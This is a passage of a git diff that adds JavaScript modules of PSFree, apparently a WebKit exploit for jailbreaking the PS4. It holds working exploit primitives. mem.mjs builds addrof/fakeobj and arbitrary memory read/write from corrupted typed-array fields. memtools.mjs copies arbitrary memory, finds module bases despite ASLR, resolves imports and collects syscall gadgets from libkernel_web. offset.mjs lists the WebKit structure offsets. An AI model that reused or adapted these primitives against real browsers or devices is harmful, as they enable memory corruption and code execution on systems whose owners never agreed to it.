+
+ // return low/high as signed integers
+
+ get bot() {
+ return this._u32[0] | 0;
+ }
+
+ get top() {
+ return this._u32[1] | 0;
+ }
+
+ neg() {
+ const u32 = this._u32;
+ const low = (~u32[0] >>> 0) + 1;
+ return new this.constructor(
+ low >>> 0,
+ ((~u32[1] >>> 0) + (low > 0xffffffff)) >>> 0,
+ );
+ }
+
+ eq(b) {
+ const values = lohi_from_one(b);
+ const u32 = this._u32;
+ return (
+ u32[0] === values[0]
+ && u32[1] === values[1]
+ );
+ }
+
+ ne(b) {
+ return !this.eq(b);
+ }
+
+ add(b) {
+ const values = lohi_from_one(b);
+ const u32 = this._u32;
+ const low = u32[0] + values[0];
+ return new this.constructor(
+ low >>> 0,
+ (u32[1] + values[1] + (low > 0xffffffff)) >>> 0,
+ );
+ }
+
+ sub(b) {
+ const values = lohi_from_one(b);
+ const u32 = this._u32;
+ const low = u32[0] + (~values[0] >>> 0) + 1;
+ return new this.constructor(
+ low >>> 0,
+ (u32[1] + (~values[1] >>> 0) + (low > 0xffffffff)) >>> 0,
+ );
+ }
+
+ toString(is_pretty=false) {
+ if (!is_pretty) {
+ const low = this.lo.toString(16).padStart(8, '0');
+ const high = this.hi.toString(16).padStart(8, '0');
+ return '0x' + high + low;
+ }
+ let high = this.hi.toString(16).padStart(8, '0');
+ high = high.substring(0, 4) + '_' + high.substring(4);
+
+ let low = this.lo.toString(16).padStart(8, '0');
+ low = low.substring(0, 4) + '_' + low.substring(4);
+
+ return '0x' + high + '_' + low;
+ }
+}
diff --git a/src/module/mem.mjs b/src/module/mem.mjs
new file mode 100644
index 0000000..2620230
--- /dev/null
+++ b/src/module/mem.mjs
@@ -0,0 +1,430 @@
+/* Copyright (C) 2023-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+import { Int, lohi_from_one } from './int64.mjs';
+import { view_m_vector, view_m_length } from './offset.mjs';
+
+export let mem = null;
+
+// cache some constants
+const off_vector = view_m_vector / 4;
+const off_vector2 = (view_m_vector + 4) / 4;
+const isInteger = Number.isInteger;
+
+function init_module(memory) {
+ mem = memory;
+}
+
+function add_and_set_addr(mem, offset, base_lo, base_hi) {
+ const values = lohi_from_one(offset);
+ const main = mem._main;
+
+ const low = base_lo + values[0];
+
+ // no need to use ">>> 0" to convert to unsigned here
+ main[off_vector] = low;
+ main[off_vector2] = base_hi + values[1] + (low > 0xffffffff);
+}
+
+export class Addr extends Int {
+ read8(offset) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
+ }
+
+ return m.read8_at(offset);
+ }
+
+ read16(offset) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
+ }
+
+ return m.read16_at(offset);
+ }
+
+ read32(offset) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
+ }
+
+ return m.read32_at(offset);
+ }
+
+ read64(offset) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
+ }
+
+ return m.read64_at(offset);
+ }
+
+ readp(offset) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
+ }
+
+ return m.readp_at(offset);
+ }
+
+ write8(offset, value) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
+ }
+
+ m.write8_at(offset, value);
+ }
+
+ write16(offset, value) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
+ }
+
+ m.write16_at(offset, value);
+ }
+
+ write32(offset, value) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
+ }
+
+ m.write32_at(offset, value);
+ }
+
+ write64(offset, value) {
+ const m = mem;
+ if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
+ m._set_addr_direct(this);
+ } else {
+ add_and_set_addr(m, offset, this.lo, this.hi);
+ offset = 0;
+ }
+
+ m.write64_at(offset, value);
+ }
+}
+
+// expected:
+// * main - Uint32Array whose m_vector points to worker
+// * worker - DataView
+//
+// addrof()/fakeobj() expectations:
+// * obj - has a "addr" property and a 0 index.
+// * addr_addr - Int, the address of the slot of obj.addr
+// * fake_addr - Int, the address of the slot of obj[0]
+//
+// a valid example for "obj" is "{addr: null, 0: 0}". note that this example
+// has [0] be 0 so that the butterfly's indexing type is ArrayWithInt32. this
+// prevents the garbage collector from incorrectly treating the slot's value as
+// a JSObject and then crash
+//
+// the relative read/write methods expect the offset to be a unsigned 32-bit
+// integer
+export class Memory {
+ constructor(main, worker, obj, addr_addr, fake_addr) {
+ this._main = main;
+ this._worker = worker;
+ this._obj = obj;
+ this._addr_low = addr_addr.lo;
+ this._addr_high = addr_addr.hi;
+ this._fake_low = fake_addr.lo;
+ this._fake_high = fake_addr.hi;
+
+ main[view_m_length / 4] = 0xffffffff;
+
+ init_module(this);
+
+ const off_mvec = view_m_vector;
+ // use this to create WastefulTypedArrays to avoid a GC crash
+ const buf = new ArrayBuffer(0);
+
+ const src = new Uint8Array(buf);
+ const sset = new Uint32Array(buf);
+ const sset_p = this.addrof(sset);
+ sset_p.write64(off_mvec, this.addrof(src).add(off_mvec));
+ sset_p.write32(view_m_length, 3);
+ this._cpysrc = src;
+ this._src_setter = sset;
+
+ const dst = new Uint8Array(buf);
+ const dset = new Uint32Array(buf);
+ const dset_p = this.addrof(dset);
+ dset_p.write64(off_mvec, this.addrof(dst).add(off_mvec));
+ dset_p.write32(view_m_length, 3);
+ dset[2] = 0xffffffff;
+ this._cpydst = dst;
+ this._dst_setter = dset;
+ }
+
+ // dst and src may overlap
+ cpy(dst, src, len) {
+ if (!(isInteger(len) && 0 <= len && len <= 0xffffffff)) {
+ throw TypeError('len not a unsigned 32-bit integer');
+ }
+
+ const dvals = lohi_from_one(dst);
+ const svals = lohi_from_one(src);
+ const dset = this._dst_setter;
+ const sset = this._src_setter;
+
+ dset[0] = dvals[0];
+ dset[1] = dvals[1];
+ sset[0] = svals[0];
+ sset[1] = svals[1];
+ sset[2] = len;
+
+ this._cpydst.set(this._cpysrc);
+ }
+
+ // allocate Garbage Collector managed memory. returns [address_of_memory,
+ // backer]. backer is the JSCell that is keeping the returned memory alive,
+ // you can drop it once you have another GC object reference the address.
+ // the backer is an implementation detail. don't use it to mutate the
+ // memory
+ gc_alloc(size) {
+ if (!isInteger(size)) {
+ throw TypeError('size not a integer');
+ }
+ if (size < 0) {
+ throw RangeError('size is negative');
+ }
+
+ const fastLimit = 1000;
+ size = (size + 7 & ~7) >> 3;
+ if (size > fastLimit) {
+ throw RangeError('size is too large');
+ }
+
+ const backer = new Float64Array(size);
+ return [mem.addrof(backer).readp(view_m_vector), backer];
+ }
+
+ fakeobj(addr) {
+ const values = lohi_from_one(addr);
+ const worker = this._worker;
+ const main = this._main;
+
+ main[off_vector] = this._fake_low;
+ main[off_vector2] = this._fake_high;
+ worker.setUint32(0, values[0], true);
+ worker.setUint32(4, values[1], true);
+ return this._obj[0];
+ }
+
+ addrof(object) {
+ // typeof considers null as a object. blacklist it as it isn't a
+ // JSObject
+ if (object === null
+ || (typeof object !== 'object' && typeof object !== 'function')
+ ) {
+ throw TypeError('argument not a JS object');
+ }
+
+ const obj = this._obj;
+ const worker = this._worker;
+ const main = this._main;
+
+ obj.addr = object;
+
+ main[off_vector] = this._addr_low;
+ main[off_vector2] = this._addr_high;
+
+ const res = new Addr(
+ worker.getUint32(0, true),
+ worker.getUint32(4, true),
+ );
+ obj.addr = null;
+
+ return res;
+ }
+
+ // expects addr to be a Int
+ _set_addr_direct(addr) {
+ const main = this._main;
+ main[off_vector] = addr.lo;
+ main[off_vector2] = addr.hi;
+ }
+
+ set_addr(addr) {
+ const values = lohi_from_one(addr);
+ const main = this._main;
+ main[off_vector] = values[0];
+ main[off_vector2] = values[1];
+ }
+
+ get_addr() {
+ const main = this._main;
+ return new Addr(main[off_vector], main[off_vector2]);
+ }
+
+ read8(addr) {
+ this.set_addr(addr);
+ return this._worker.getUint8(0);
+ }
+
+ read16(addr) {
+ this.set_addr(addr);
+ return this._worker.getUint16(0, true);
+ }
+
+ read32(addr) {
+ this.set_addr(addr);
+ return this._worker.getUint32(0, true);
+ }
+
+ read64(addr) {
+ this.set_addr(addr);
+ const worker = this._worker;
+ return new Int(worker.getUint32(0, true), worker.getUint32(4, true));
+ }
+
+ // returns a pointer instead of an Int
+ readp(addr) {
+ this.set_addr(addr);
+ const worker = this._worker;
+ return new Addr(worker.getUint32(0, true), worker.getUint32(4, true));
+ }
+
+ read8_at(offset) {
+ if (!isInteger(offset)) {
+ throw TypeError('offset not a integer');
+ }
+ return this._worker.getUint8(offset);
+ }
+
+ read16_at(offset) {
+ if (!isInteger(offset)) {
+ throw TypeError('offset not a integer');
+ }
+ return this._worker.getUint16(offset, true);
+ }
+
+ read32_at(offset) {
+ if (!isInteger(offset)) {
+ throw TypeError('offset not a integer');
+ }
+ return this._worker.getUint32(offset, true);
+ }
+
+ read64_at(offset) {
+ if (!isInteger(offset)) {
+ throw TypeError('offset not a integer');
+ }
+ const worker = this._worker;
+ return new Int(
+ worker.getUint32(offset, true),
+ worker.getUint32(offset + 4, true),
+ );
+ }
+
+ readp_at(offset) {
+ if (!isInteger(offset)) {
+ throw TypeError('offset not a integer');
+ }
+ const worker = this._worker;
+ return new Addr(
+ worker.getUint32(offset, true),
+ worker.getUint32(offset + 4, true),
+ );
+ }
+
+ write8(addr, value) {
+ this.set_addr(addr);
+ this._worker.setUint8(0, value);
+ }
+
+ write16(addr, value) {
+ this.set_addr(addr);
+ this._worker.setUint16(0, value, true);
+ }
+
+ write32(addr, value) {
+ this.set_addr(addr);
+ this._worker.setUint32(0, value, true);
+ }
+
+ write64(addr, value) {
+ const values = lohi_from_one(value);
+ this.set_addr(addr);
+ const worker = this._worker;
+ worker.setUint32(0, values[0], true);
+ worker.setUint32(4, values[1], true);
+ }
+
+ write8_at(offset, value) {
+ if (!isInteger(offset)) {
+ throw TypeError('offset not a integer');
+ }
+ this._worker.setUint8(offset, value);
+ }
+
+ write16_at(offset, value) {
+ if (!isInteger(offset)) {
+ throw TypeError('offset not a integer');
+ }
+ this._worker.setUint16(offset, value, true);
+ }
+
+ write32_at(offset, value) {
+ if (!isInteger(offset)) {
+ throw TypeError('offset not a integer');
+ }
+ this._worker.setUint32(offset, value, true);
+ }
+
+ write64_at(offset, value) {
+ if (!isInteger(offset)) {
+ throw TypeError('offset not a integer');
+ }
+ const values = lohi_from_one(value);
+ const worker = this._worker;
+ worker.setUint32(offset, values[0], true);
+ worker.setUint32(offset + 4, values[1], true);
+ }
+}
diff --git a/src/module/memtools.mjs b/src/module/memtools.mjs
new file mode 100644
index 0000000..3445ad2
--- /dev/null
+++ b/src/module/memtools.mjs
@@ -0,0 +1,256 @@
+/* Copyright (C) 2023-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+// This module are for utilities that depend on running the exploit first
+
+import { Int } from './int64.mjs';
+import { mem } from './mem.mjs';
+import { align } from './utils.mjs';
+import { page_size } from './offset.mjs';
+import { BufferView } from './rw.mjs';
+import { View1 } from './view.mjs';
+
+import * as off from './offset.mjs';
+
+// creates an ArrayBuffer whose contents is copied from addr
+export function make_buffer(addr, size) {
+ // see enum TypedArrayMode from
+ // WebKit/Source/JavaScriptCore/runtime/JSArrayBufferView.h
+ // at webkitgtk 2.34.4
+ //
+ // see possiblySharedBuffer() from
+ // WebKit/Source/JavaScriptCore/runtime/JSArrayBufferViewInlines.h
+ // at webkitgtk 2.34.4
+
+ // We will create an OversizeTypedArray via requesting an Uint8Array whose
+ // number of elements will be greater than fastSizeLimit (1000).
+ //
+ // We will not use a FastTypedArray since its m_vector is visited by the
+ // GC and we will temporarily change it. The GC expects addresses from the
+ // JS heap, and that heap has metadata that the GC uses. The GC will likely
+ // crash since valid metadata won't likely be found at arbitrary addresses.
+ //
+ // The FastTypedArray approach will have a small time frame where the GC
+ // can inspect the invalid m_vector field.
+ //
+ // Views created via "new TypedArray(x)" where "x" is a number will always
+ // have an m_mode < WastefulTypedArray.
+ const u = new Uint8Array(1001);
+ const u_addr = mem.addrof(u);
+
+ // we won't change the butterfly and m_mode so we won't save those
+ const old_addr = u_addr.read64(off.view_m_vector);
+ const old_size = u_addr.read32(off.view_m_length);
+
+ u_addr.write64(off.view_m_vector, addr);
+ u_addr.write32(off.view_m_length, size);
+
+ const copy = new Uint8Array(u.length);
+ copy.set(u);
+
+ // Views with m_mode < WastefulTypedArray don't have an ArrayBuffer object
+ // associated with them, if we ask for view.buffer, the view will be
+ // converted into a WastefulTypedArray and an ArrayBuffer will be created.
+ // This is done by calling slowDownAndWasteMemory().
+ //
+ // We can't use slowDownAndWasteMemory() on u since that will create a
+ // JSC::ArrayBufferContents with its m_data pointing to addr. On the
+ // ArrayBuffer's death, it will call WTF::fastFree() on m_data. This can
+ // cause a crash if the m_data is not from the fastMalloc heap, and even if
+ // it is, freeing abitrary addresses is dangerous as it may lead to a
+ // use-after-free.
+ const res = copy.buffer;
+
+ // restore
+ u_addr.write64(off.view_m_vector, old_addr);
+ u_addr.write32(off.view_m_length, old_size);
+
+ return res;
+}
+
+// these values came from analyzing dumps from CelesteBlue
+function check_magic_at(p, is_text) {
+ // byte sequence that is very likely to appear at offset 0 of a .text
+ // segment
+ const text_magic = [
+ new Int(0xe5894855, 0x56415741),
+ new Int(0x54415541, 0x8d485053),
+ ];
+
+ // the .data "magic" is just a portion of the PT_SCE_MODULE_PARAM segment
+
+ // .data magic from 3.00, 6.00, and 6.20
+ //const data_magic = [
+ // new Int(0x18),
+ // new Int(0x3c13f4bf, 0x1),
+ //];
+
+ // .data magic from 8.00 and 8.03
+ const data_magic = [
+ new Int(0x20),
+ new Int(0x3c13f4bf, 0x2),
+ ];
+
+ const magic = is_text ? text_magic : data_magic;
+ const value = [p.read64(0), p.read64(8)];
+
+ return value[0].eq(magic[0]) && value[1].eq(magic[1]);
+}
+
+// Finds the base address of a segment: .text or .data
+// Used on the ps4 to locate module base addresses
+// * p:
+// an address pointing somewhere in the segment to search
+// * is_text:
+// whether the segment is .text or .data
+// * is_back:
+// whether to search backwards (to lower addresses) or forwards
+//
+// Modules are likely to be separated by a couple of unmapped pages because of
+// Address Space Layout Randomization (all module base addresses are
+// randomized). This means that this function will either succeed or crash on
+// a page fault, if the magic is not present.
+//
+// To be precise, modules are likely to be "surrounded" by unmapped pages, it
+// does not mean that the distance between a boundary of a module and the
+// nearest unmapped page is 0.
+//
+// The boundaries of a module is its base and end addresses.
+//
+// let module_base_addr = find_base(...);
+// // Not guaranteed to crash, the nearest unmapped page is not necessarily at
+// // 0 distance away from module_base_addr.
+// addr.read8(-1);
+//
+export function find_base(addr, is_text, is_back) {
+ // align to page size
+ addr = align(addr, page_size);
+ const offset = (is_back ? -1 : 1) * page_size;
+ while (true) {
+ if (check_magic_at(addr, is_text)) {
+ break;
+ }
+ addr = addr.add(offset);
+ }
+ return addr;
+}
+
+// gets the address of the underlying buffer of a JSC::JSArrayBufferView
+export function get_view_vector(view) {
+ if (!ArrayBuffer.isView(view)) {
+ throw TypeError(`object not a JSC::JSArrayBufferView: ${view}`);
+ }
+ return mem.addrof(view).readp(off.view_m_vector);
+}
+
+export function resolve_import(import_addr) {
+ if (import_addr.read16(0) !== 0x25ff) {
+ throw Error(
+ `instruction at ${import_addr} is not of the form: jmp qword`
+ + ' [rip + X]');
+ }
+ // module_function_import:
+ // jmp qword [rip + X]
+ // ff 25 xx xx xx xx // signed 32-bit displacement
+ const disp = import_addr.read32(2);
+ // assume disp and offset are 32-bit integers
+ // x | 0 will always be a signed integer
+ const offset = (disp | 0) + 6;
+ // The rIP value used by "jmp [rip + X]" instructions is actually the rIP
+ // of the next instruction. This means that the actual address used is
+ // [rip + X + sizeof(jmp_insn)], where sizeof(jmp_insn) is the size of the
+ // jump instruction, which is 6 in this case.
+ const function_addr = import_addr.readp(offset);
+
+ return function_addr;
+}
+
+export function init_syscall_array(
+ syscall_array,
+ libkernel_web_base,
+ max_search_size,
+) {
+ if (!Number.isInteger(max_search_size)) {
+ throw TypeError(
+ `max_search_size is not a integer: ${max_search_size}`);
+ }
+ if (max_search_size < 0) {
+ throw Error(`max_search_size is less than 0: ${max_search_size}`);
+ }
+
+ const libkernel_web_buffer = make_buffer(
+ libkernel_web_base,
+ max_search_size,
+ );
+ const kbuf = new BufferView(libkernel_web_buffer);
+
+ // Search 'rdlo' string from libkernel_web's .rodata section to gain an
+ // upper bound on the size of the .text section.
+ let text_size = 0;
+ let found = false;
+ for (let i = 0; i < max_search_size; i++) {
+ if (kbuf[i] === 0x72
+ && kbuf[i + 1] === 0x64
+ && kbuf[i + 2] === 0x6c
+ && kbuf[i + 3] === 0x6f
+ ) {
+ text_size = i;
+ found = true;
+ break;
+ }
+ }
+ if (!found) {
+ throw Error(
+ '"rdlo" string not found in libkernel_web, base address:'
+ + ` ${libkernel_web_base}`);
+ }
+
+ // search for the instruction sequence:
+ // syscall_X:
+ // mov rax, X
+ // mov r10, rcx
+ // syscall
+ for (let i = 0; i < text_size; i++) {
+ if (kbuf[i] === 0x48
+ && kbuf[i + 1] === 0xc7
+ && kbuf[i + 2] === 0xc0
+ && kbuf[i + 7] === 0x49
+ && kbuf[i + 8] === 0x89
+ && kbuf[i + 9] === 0xca
+ && kbuf[i + 10] === 0x0f
+ && kbuf[i + 11] === 0x05
+ ) {
+ const syscall_num = kbuf.read32(i + 3);
+ syscall_array[syscall_num] = libkernel_web_base.add(i);
+ // skip the sequence
+ i += 11;
+ }
+ }
+}
+
+// create a char array like in the C language
+//
+// string to view since it's easier to get the address of the buffer this way
+export function cstr(str) {
+ str += '\0';
+ return View1.from(str, c => c.codePointAt(0));
+}
+
+// we are re-exporting this since users that want to use cstr() usually want
+// jstr() as well. they are likely working with functions that take/return
+// strings
+export { jstr } from './utils.mjs';
diff --git a/src/module/offset.mjs b/src/module/offset.mjs
new file mode 100644
index 0000000..74c9dc0
--- /dev/null
+++ b/src/module/offset.mjs
@@ -0,0 +1,62 @@
+/* Copyright (C) 2023-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+// WebKit offsets start
+
+// offsets for JSC::JSObject
+export const js_cell = 0;
+export const js_butterfly = 0x8;
+// start of the array of inline properties (JSValues)
+export const js_inline_prop = 0x10;
+
+// sizeof JSC::JSObject
+export const size_jsobj = js_inline_prop;
+
+// offsets for JSC::JSArrayBufferView
+export const view_m_vector = 0x10;
+export const view_m_length = 0x18;
+export const view_m_mode = 0x1c;
+
+// sizeof JSC::JSArrayBufferView
+export const size_view = 0x20;
+
+// offsets for WTF::StringImpl
+export const strimpl_strlen = 4;
+export const strimpl_m_data = 8;
+export const strimpl_inline_str = 0x14;
+
+// sizeof WTF::StringImpl
+export const size_strimpl = 0x18;
+
+// offsets for WebCore::JSHTMLTextAreaElement, subclass of JSObject
+
+// offset to m_wrapped, pointer to a DOM object
+// for this class, it's a WebCore::HTMLTextAreaElement pointer
+export const jsta_impl = 0x18;
+
+// sizeof WebCore::JSHTMLTextAreaElement
+export const size_jsta = 0x20;
+
+// WebKit offsets end
+
+export const KB = 1024;
+export const MB = KB * KB;
+export const GB = KB * KB * KB;
+export const page_size = 16 * KB; // page size on the ps4
+
+// size of the buffer used by setcontext/getcontext (see module/chain.mjs)
+export const context_size = 0xc8;
diff --git a/src/module/rw.mjs b/src/module/rw.mjs
new file mode 100644
index 0000000..2075817
--- /dev/null
+++ b/src/module/rw.mjs
@@ -0,0 +1,140 @@
+/* Copyright (C) 2023-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+import { Int, lohi_from_one } from './int64.mjs';
+
+// DataView's accessors are constant time and are faster when doing multi-byte
+// accesses but the single-byte accessors are slightly slower compared to just
+// indexing the Uint8Array
+//
+// to get the best of both worlds, BufferView uses a DataView for multi-byte
+// accesses and a Uint8Array for single-byte
+//
+// instances of BufferView will their have m_mode set to WastefulTypedArray
+// since we use the .buffer getter to create a DataView
+export class BufferView extends Uint8Array {
+ constructor(...args) {
+ super(...args);
+ this._dview = new DataView(this.buffer, this.byteOffset);
+ }
+
+ read16(offset) {
+ return this._dview.getUint16(offset, true);
+ }
+
+ read32(offset) {
+ return this._dview.getUint32(offset, true);
+ }
+
+ read64(offset) {
+ return new Int(
+ this._dview.getUint32(offset, true),
+ this._dview.getUint32(offset + 4, true),
+ );
+ }
+
+ write16(offset, value) {
+ this._dview.setUint16(offset, value, true);
+ }
+
+ write32(offset, value) {
+ this._dview.setUint32(offset, value, true);
+ }
+
+ write64(offset, value) {
+ const values = lohi_from_one(value);
+ this._dview.setUint32(offset, values[0], true);
+ this._dview.setUint32(offset + 4, values[1], true);
+ }
+}
+
+// WARNING: These functions are now deprecated. use BufferView instead.
+
+// view.buffer is the underlying ArrayBuffer of a TypedArray, but since we will
+// be corrupting the m_vector of our target views later, the ArrayBuffer's
+// buffer will not correspond to our fake m_vector anyway.
+//
+// can't use:
+//
+// function read32(u8_view, offset) {
+// let res = new Uint32Array(u8_view.buffer, offset, 1);
+// return res[0];
+// }
+//
+// to implement read32, we need to index the view instead:
+//
+// function read32(u8_view, offset) {
+// let res = 0;
+// for (let i = 0; i < 4; i++) {
+// res += u8_view[offset + i] << i*8;
+// }
+// // << returns a signed integer, >>> converts it to unsigned
+// return res >>> 0;
+// }
+
+// for reads less than 8 bytes
+function read(u8_view, offset, size) {
+ let res = 0;
+ for (let i = 0; i < size; i++) {
+ res += u8_view[offset + i] << i*8;
+ }
+ // << returns a signed integer, >>> converts it to unsigned
+ return res >>> 0;
+}
+
+export function read16(u8_view, offset) {
+ return read(u8_view, offset, 2);
+}
+
+export function read32(u8_view, offset) {
+ return read(u8_view, offset, 4);
+}
+
+export function read64(u8_view, offset) {
+ return new Int(read32(u8_view, offset), read32(u8_view, offset + 4));
+}
+
+// for writes less than 8 bytes
+function write(u8_view, offset, value, size) {
+ for (let i = 0; i < size; i++) {
+ u8_view[offset + i] = (value >>> i*8) & 0xff;
+ }
+}
+
+export function write16(u8_view, offset, value) {
+ write(u8_view, offset, value, 2);
+}
+
+export function write32(u8_view, offset, value) {
+ write(u8_view, offset, value, 4);
+}
+
+export function write64(u8_view, offset, value) {
+ if (!(value instanceof Int)) {
+ throw TypeError('write64 value must be an Int');
+ }
+
+ let low = value.lo;
+ let high = value.hi;
+
+ for (let i = 0; i < 4; i++) {
+ u8_view[offset + i] = (low >>> i*8) & 0xff;
+ }
+ for (let i = 0; i < 4; i++) {
+ u8_view[offset + 4 + i] = (high >>> i*8) & 0xff;
+ }
+}
diff --git a/src/module/utils.mjs b/src/module/utils.mjs
new file mode 100644
index 0000000..7c20ef1
--- /dev/null
+++ b/src/module/utils.mjs
@@ -0,0 +1,172 @@
+/* Copyright (C) 2023-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+import { Int } from './int64.mjs';
+
+export class DieError extends Error {
+ constructor(...args) {
+ super(...args);
+ this.name = this.constructor.name;
+ }
+}
+
+export function die(msg='') {
+ throw new DieError(msg);
+}
+
+const console = document.getElementById('console');
+export function log(msg='') {
+ console.append(msg + '\n');
+}
+
+export function clear_log() {
+ console.innerHTML = null;
+}
+
+// alignment must be 32 bits and is a power of 2
+export function align(a, alignment) {
+ if (!(a instanceof Int)) {
+ a = new Int(a);
+ }
+ const mask = -alignment & 0xffffffff;
+ let type = a.constructor;
+ let low = a.lo & mask;
+ return new type(low, a.hi);
+}
+
+export async function send(url, buffer, file_name, onload=() => {}) {
+ const file = new File(
+ [buffer],
+ file_name,
+ {type:'application/octet-stream'}
+ );
+ const form = new FormData();
+ form.append('upload', file);
+
+ log('send');
+ const response = await fetch(url, {method: 'POST', body: form});
+
+ if (!response.ok) {
+ throw Error(`Network response was not OK, status: ${response.status}`);
+ }
+ onload();
+}
+
+// mostly used to yield to the GC. marking is concurrent but collection isn't
+//
+// yielding also lets the DOM update. which is useful since we use the DOM for
+// logging and we loop when waiting for a collection to occur
+export function sleep(ms=0) {
+ return new Promise(resolve => setTimeout(resolve, ms));
+}
+
+export function hex(number) {
+ return '0x' + number.toString(16);
+}
+
+// no "0x" prefix
+export function hex_np(number) {
+ return number.toString(16);
+}
+
+// expects a byte array
+export function hexdump(view) {
+ const num_16 = view.length & ~15;
+ const residue = view.length - num_16;
+ const max_off_len = hex_np(((view.length + 7) & ~7) - 1).length;
+
+ function chr(i) {
+ if (0x20 <= i && i <= 0x7e) {
+ return String.fromCodePoint(i);
+ }
+ return '.';
+ }
+
+ function to_hex(view, offset, length) {
+ return (
+ [...view.slice(offset, offset + length)]
+ .map(e => hex_np(e).padStart(2, '0'))
+ .join(' ')
+ );
+ }
+
+ let bytes = [];
+ for (let i = 0; i < num_16; i += 16) {
+ const long1 = to_hex(view, i, 8);
+ const long2 = to_hex(view, i + 8, 8);
+
+ let print = '';
+ for (let j = 0; j < 16; j++) {
+ print += chr(view[j]);
+ }
+
+ bytes.push([`${long1} ${long2}`, print]);
+ }
+
+ if (residue) {
+ const small = residue <= 8;
+ const long1_len = small ? residue : 8;
+
+ let long1 = to_hex(view, num_16, long1_len);
+ if (small) {
+ for (let i = 0; i < 8 - residue; i++) {
+ long1 += ' xx';
+ }
+ }
+
+ const long2 = (() => {
+ if (small) {
+ return Array(8).fill('xx').join(' ');
+ }
+
+ let res = to_hex(view, num_16 + 8, residue - 8);
+ for (let i = 0; i < 16 - residue; i++) {
+ res += ' xx';
+ }
+
+ return res;
+ })();
+
+ let print = '';
+ for (let i = 0; i < residue; i++) {
+ print += chr(view[num_16 + i]);
+ }
+ for (let i = 0; i < 16 - residue; i++) {
+ print += ' ';
+ }
+
+ bytes.push([`${long1} ${long2}`, print]);
+ }
+
+ for (const [pos, [val, print]] of bytes.entries()) {
+ const off = hex_np(pos * 16).padStart(max_off_len, '0');
+ log(`${off} | ${val} |${print}|`);
+ }
+}
+
+// make a JavaScript string
+export function jstr(buffer) {
+ let res = '';
+ for (const item of buffer) {
+ if (item === 0) {
+ break;
+ }
+ res += String.fromCodePoint(item);
+ }
+ // convert to primitive string
+ return String(res);
+}
diff --git a/src/module/view.mjs b/src/module/view.mjs
new file mode 100644
index 0000000..2c5666b
--- /dev/null
+++ b/src/module/view.mjs
@@ -0,0 +1,261 @@
+/* Copyright (C) 2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
